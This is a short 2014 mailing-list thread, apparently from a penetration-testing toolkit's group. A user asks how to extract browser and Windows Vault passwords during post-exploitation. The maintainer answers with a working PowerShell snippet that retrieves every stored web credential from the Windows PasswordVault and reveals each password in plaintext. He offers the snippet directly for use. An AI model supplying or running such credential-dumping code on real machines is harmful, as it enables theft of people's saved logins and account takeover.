extracting browser passwords with powershell

1,781 views
Skip to first unread message

Frederik

unread,
Oct 30, 2014, 7:42:26 AM10/30/14
to nishan...@googlegroups.com
Hello,

is there a way to do more post tasks with powershell?
normaly my way is:
collecting all passwords from the system (dumping hashs) works with nishang allready
but:
extract browser stored passwords like this?

Windows 8 Password Vault
Browsers
clipboards
and so on?

best
Frederik

Nikhil Mittal

unread,
Oct 30, 2014, 10:31:03 AM10/30/14
to Frederik, nishan...@googlegroups.com
Hi List,

I have been working on the Clipoard and Windows Vault thing and it should be out in few weeks. Meanwhile, use this for Web Credentials
from Windows vault.

$ClassHolder = [Windows.Security.Credentials.
PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$VaultObj = new-object Windows.Security.Credentials.PasswordVault
$VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }

Reference -  a Stack Overflow link which I missed

Regards,
Nikhil
--
Regards,
Nikhil SamratAshok Mittal
nikhil_mitt
http://labofapenetrationtester.blogspot.com/
Reply all
Reply to author
Forward
0 new messages